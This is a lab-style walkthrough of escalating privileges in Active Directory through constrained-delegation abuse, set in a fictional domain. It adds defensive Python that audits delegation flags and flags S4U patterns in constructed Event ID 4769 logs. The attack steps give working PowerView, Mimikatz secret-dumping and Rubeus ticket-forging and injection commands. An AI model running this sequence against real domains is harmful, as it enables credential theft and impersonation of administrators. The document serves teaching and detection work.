Constrained Delegation Attack Path – Full Workflow Example
Goal:
Start as a low-privileged domain user and escalate to a server-level administrator using Constrained Delegation abuse.
Lab Environment (Fictional Setup):
| Component | Name |
|---|---|
| Domain Name | intranet.offensive.local |
| Domain Controller | DC01.intranet.offensive.local |
| Web Server | WEB01.intranet.offensive.local |
| SQL Server | SQL01.intranet.offensive.local |
| Tier 1 Admin | t1_john.murphy |
| Service Account | svcWebApp |
| Your Low-Priv User | alice.reed |
Step-by-Step Constrained Delegation Abuse
Step 1: Initial Access
You’re logged in or have a shell as alice.reed, a regular domain user. You start enumerating the environment.
Step 2: Identify Users Trusted for Delegation
We check which accounts have constrained delegation rights.
Tool: PowerView
```powershell
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
```
Output:
```text
svcWebApp -> can delegate to: HTTP/SQL01.intranet.offensive.local
```
Translation: If we can control svcWebApp, we can impersonate any user to the HTTP service on SQL01.
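Defender's view of the same step: the attribute PowerView reads here (the TRUSTED_TO_AUTH_FOR_DELEGATION bit in userAccountControl together with msDS-AllowedToDelegateTo) is exactly what a periodic audit should pull. The Python below is an added example, not part of this walkthrough and not PowerView's code. It runs over a constructed directory export shaped like Get-ADUser output (no domain controller is contacted), classifies each account's delegation flavour, ranks the ones whose allowed SPNs land on high-value hosts, and, going one step beyond the page, lists privileged users that lack the "account is sensitive and cannot be delegated" flag, which is what stops S4U2proxy from minting tickets in their name. HIGH_VALUE_HOSTS, PRIVILEGED_PREFIXES and the sample records are assumptions for this lab.

```python
"""Audit who holds Kerberos delegation rights in a directory export.

Added example, not part of the original walkthrough. SAMPLE_DIRECTORY is a
constructed stand-in for what a defender would export with
Get-ADUser / Get-ADComputer (-Properties userAccountControl,
msDS-AllowedToDelegateTo); no domain controller is contacted.
"""

# userAccountControl bit flags (documented Microsoft values)
TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
NOT_DELEGATED = 0x00100000                   # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # protocol transition ("use any authentication protocol")
NORMAL_ACCOUNT = 0x00000200

# Assumption for this lab: hosts whose services are high value (Tier 0/1)
HIGH_VALUE_HOSTS = {"dc01.intranet.offensive.local", "sql01.intranet.offensive.local"}
# Assumption: naming convention for privileged users, taken from the lab table
PRIVILEGED_PREFIXES = ("t0_", "t1_")

SAMPLE_DIRECTORY = [  # constructed records
    {"sAMAccountName": "svcWebApp",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["HTTP/SQL01.intranet.offensive.local"]},
    {"sAMAccountName": "svcBackup",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svcPrint",  # constrained, Kerberos-only (no protocol transition)
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["HTTP/PRINT01.intranet.offensive.local"]},
    {"sAMAccountName": "t1_john.murphy",  # Tier 1 admin, not marked sensitive
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "alice.reed",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]


def classify_delegation(record):
    """Return which delegation flavour an account holds."""
    uac = record["userAccountControl"]
    targets = record.get("msDS-AllowedToDelegateTo") or []
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"  # the variant abused in the walkthrough
    if targets:
        return "constrained-kerberos-only"
    return "none"


def spn_host(spn):
    """'HTTP/SQL01.intranet.offensive.local:443' -> 'sql01.intranet.offensive.local'."""
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":", 1)[0].lower()


def audit_delegation(records, high_value_hosts=HIGH_VALUE_HOSTS):
    """List every delegation-capable account with a severity for triage."""
    hv = {h.lower() for h in high_value_hosts}
    findings = []
    for rec in records:
        kind = classify_delegation(rec)
        if kind == "none":
            continue
        targets = rec.get("msDS-AllowedToDelegateTo") or []
        reaches = sorted({spn_host(t) for t in targets} & hv)
        if kind == "unconstrained":
            severity = "critical"  # can impersonate anyone to any service
        elif kind == "constrained-protocol-transition":
            severity = "high" if reaches else "medium"  # S4U2self: no user interaction needed
        else:
            severity = "medium" if reaches else "low"  # needs a forwardable ticket from a real user logon
        findings.append({"account": rec["sAMAccountName"], "delegation": kind,
                         "targets": targets, "high_value_targets": reaches,
                         "severity": severity})
    rank = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    return sorted(findings, key=lambda f: rank[f["severity"]])


def unprotected_privileged_accounts(records, prefixes=PRIVILEGED_PREFIXES):
    """Privileged users lacking NOT_DELEGATED: S4U2proxy can still mint tickets as them."""
    return sorted(r["sAMAccountName"] for r in records
                  if r["sAMAccountName"].lower().startswith(prefixes)
                  and not r["userAccountControl"] & NOT_DELEGATED)


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_DIRECTORY):
        print(f"[{f['severity']:8}] {f['account']:16} {f['delegation']:32} -> "
              f"{', '.join(f['targets']) or '-'}")
    print("privileged accounts not marked sensitive:",
          unprotected_privileged_accounts(SAMPLE_DIRECTORY))
```

On real data, replace SAMPLE_DIRECTORY with the parsed export and extend HIGH_VALUE_HOSTS with your own Tier 0 and Tier 1 servers; the svcWebApp row is the one this walkthrough exploits and comes out as "high" precisely because protocol transition plus an SPN on SQL01 is the combination that needs no user to ever log on.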
Step 3: Hunt for svcWebApp on the Network
We want to find where svcWebApp is used. This could be:
- A scheduled task
- A running service
- An IIS App Pool identity
- A saved credential
On a compromised host (e.g., WEB01), check:
```powershell
Get-WmiObject Win32_Service | Where-Object { $_.StartName -like "*svcWebApp*" }
```
You find a Windows service running as intranet\svcWebApp on WEB01.
Step 4: Dump Credentials (Assume Admin on Host)
Since you have admin on WEB01, use Mimikatz to dump the password:
```text
.\mimikatz.exe
mimikatz # token::elevate
mimikatz # lsadump::secrets
```
Output:
```text
Secret : _SC_WebAppUpdater
cur/text: S3rv1ceP@ssword!
```
Now you have the plaintext password for svcWebApp.
Step 5: Request a TGT for svcWebApp
Use Rubeus or Kekeo to get a TGT with the password you dumped.
Rubeus:
```powershell
Rubeus.exe asktgt /user:svcWebApp /domain:intranet.offensive.local /password:S3rv1ceP@ssword! /nowrap
```
You get a TGT .kirbi file for svcWebApp.
Step 6: Forge TGS for a Target User to Allowed Service
Let’s impersonate t1_john.murphy (a known Tier 1 Admin).
Since svcWebApp can delegate only to HTTP/SQL01, we need to generate a TGS that says:
“I am t1_john.murphy, give me access to HTTP/SQL01.”
Rubeus:
```powershell
Rubeus.exe s4u /user:svcWebApp /password:S3rv1ceP@ssword! /impersonateuser:t1_john.murphy /msdsspn:http/SQL01.intranet.offensive.local /domain:intranet.offensive.local
```
You receive a .kirbi TGS ticket.
Step 7: Inject the Ticket into Memory
Now that we have the TGS, we inject it with Mimikatz or Rubeus.
Mimikatz:
```text
privilege::debug
kerberos::ptt <ticket.kirbi>
```
OR Rubeus:
```powershell
Rubeus.exe ptt /ticket:<ticket.kirbi>
```
Step 8: Access the Target System (SQL01)
Let’s test access by initiating a PowerShell Remoting session to SQL01.
```powershell
Enter-PSSession -ComputerName SQL01.intranet.offensive.local
whoami
```
Output:
```text
intranet\t1_john.murphy
```
Boom — you now have a remote session on SQL01 as a Tier 1 Admin via constrained delegation abuse.
Summary of What You Did
| Phase | Action |
|---|---|
| Recon | Found svcWebApp can delegate to HTTP/SQL01 |
| Host Enum | Discovered a service running as svcWebApp on WEB01 |
| Post-Exploitation | Used Mimikatz to dump svcWebApp’s credentials |
| Ticket Crafting | Used Kekeo/Rubeus to get a TGT and forge TGS |
| Ticket Injection | Loaded forged tickets into memory |
| Lateral Movement | Remoted into SQL01 as a Tier 1 Admin |
Defender Notes: How to Prevent This
- Minimize delegation: Avoid giving service accounts delegation unless truly necessary.
- Audit trustedToAuthForDelegation regularly.
- Use gMSAs instead of regular service accounts when possible.
- Detect forged tickets using Event ID 4769 anomalies and TGS request patterns.
- Deploy Windows Defender for Identity / Microsoft ATA to monitor ticket behavior.
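What the "Event ID 4769 anomalies" bullet looks like in practice: the s4u step above makes the KDC issue two service tickets in a row, an S4U2self ticket to svcWebApp itself and then the S4U2proxy ticket for t1_john.murphy to HTTP/SQL01, and the domain controller logs a 4769 for each. The Python below is an added example, not part of this walkthrough. It runs over constructed event records shaped like the EventData fields of Security log event 4769 (TargetUserName, ServiceName, TransitedServices, IpAddress, Status); the events are invented for this lab. Two assumptions drive the logic: a Transited Services value other than "-" marks an S4U2proxy request and names the delegating account, and a request where the account name equals the service name is the preceding S4U2self. PRIVILEGED_USERS and DELEGATION_ACCOUNTS are lab assumptions; in production feed them from the delegation audit.

```python
"""Flag Kerberos service-ticket (Event ID 4769) requests that look like S4U abuse.

Added example, not part of the original walkthrough. SAMPLE_4769_EVENTS is
constructed to mirror the EventData fields of Security log event 4769 on a
domain controller; nothing here reads a real log.
"""
from collections import defaultdict

# Assumptions for this lab: who is privileged and which accounts hold delegation rights
PRIVILEGED_USERS = {"t1_john.murphy", "administrator"}
DELEGATION_ACCOUNTS = {"svcwebapp"}

SAMPLE_4769_EVENTS = [  # constructed records, in log order
    {"TargetUserName": "alice.reed@INTRANET.OFFENSIVE.LOCAL",  # ordinary file-share access
     "ServiceName": "CIFS/FS01.intranet.offensive.local",
     "TransitedServices": "-", "IpAddress": "::ffff:10.10.10.25", "Status": "0x0"},
    {"TargetUserName": "svcWebApp@INTRANET.OFFENSIVE.LOCAL",  # S4U2self: ticket to itself
     "ServiceName": "svcWebApp",
     "TransitedServices": "-", "IpAddress": "::ffff:10.10.10.31", "Status": "0x0"},
    {"TargetUserName": "t1_john.murphy@INTRANET.OFFENSIVE.LOCAL",  # S4U2proxy result
     "ServiceName": "HTTP/SQL01.intranet.offensive.local",
     "TransitedServices": "svcWebApp@INTRANET.OFFENSIVE.LOCAL",
     "IpAddress": "::ffff:10.10.10.31", "Status": "0x0"},
    {"TargetUserName": "alice.reed@INTRANET.OFFENSIVE.LOCAL",  # refused by the KDC, ignored
     "ServiceName": "HTTP/SQL01.intranet.offensive.local",
     "TransitedServices": "-", "IpAddress": "::ffff:10.10.10.25", "Status": "0x12"},
]


def principal(value):
    """'svcWebApp@INTRANET.OFFENSIVE.LOCAL' -> 'svcwebapp' (realm stripped, lower-cased)."""
    return value.split("@", 1)[0].lower()


def analyse_4769(event):
    """Return an alert dict for a suspicious event, or None for a benign one."""
    if event.get("Status", "0x0") != "0x0":
        return None  # KDC refused the request; no ticket was issued
    user = principal(event["TargetUserName"])
    service = principal(event["ServiceName"])
    transited = event.get("TransitedServices", "-").strip()
    if transited and transited != "-":
        delegator = principal(transited)
        alert = {"kind": "s4u2proxy", "severity": "medium", "user": user, "service": service,
                 "source": event["IpAddress"],
                 "reasons": [f"S4U2proxy via {delegator} to {service}"]}
        if delegator in DELEGATION_ACCOUNTS and user in PRIVILEGED_USERS:
            alert["severity"] = "high"
            alert["reasons"].append(f"privileged user {user} impersonated")
        return alert
    if user == service and user in DELEGATION_ACCOUNTS:
        return {"kind": "s4u2self", "severity": "low", "user": user, "service": service,
                "source": event["IpAddress"],
                "reasons": [f"S4U2self: {user} requested a ticket to itself"]}
    return None


def correlate_s4u(events):
    """Analyse every event, then upgrade an S4U2proxy alert to critical when the same
    source address also produced an S4U2self alert: that back-to-back pair is what a
    tool performing both steps in one run leaves behind on the domain controller."""
    alerts = [a for a in (analyse_4769(ev) for ev in events) if a]
    kinds_by_source = defaultdict(set)
    for a in alerts:
        kinds_by_source[a["source"]].add(a["kind"])
    for a in alerts:
        if a["kind"] == "s4u2proxy" and "s4u2self" in kinds_by_source[a["source"]]:
            a["severity"] = "critical"
            a["reasons"].append("S4U2self and S4U2proxy from the same source")
    return alerts


if __name__ == "__main__":
    for a in correlate_s4u(SAMPLE_4769_EVENTS):
        print(f"[{a['severity']:8}] {a['source']:20} {a['user']} -> {a['service']}: "
              + "; ".join(a["reasons"]))
```

The second event on its own is only a low-severity hint (services legitimately call S4U2self to check a user's group membership), so the value is in the correlation: a delegation account asking for a ticket to itself and, moments later, a privileged user's ticket to a service on that account's allowed list, both from one source. Tune the time window and the source key (the IpAddress field) to your environment before relying on it.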
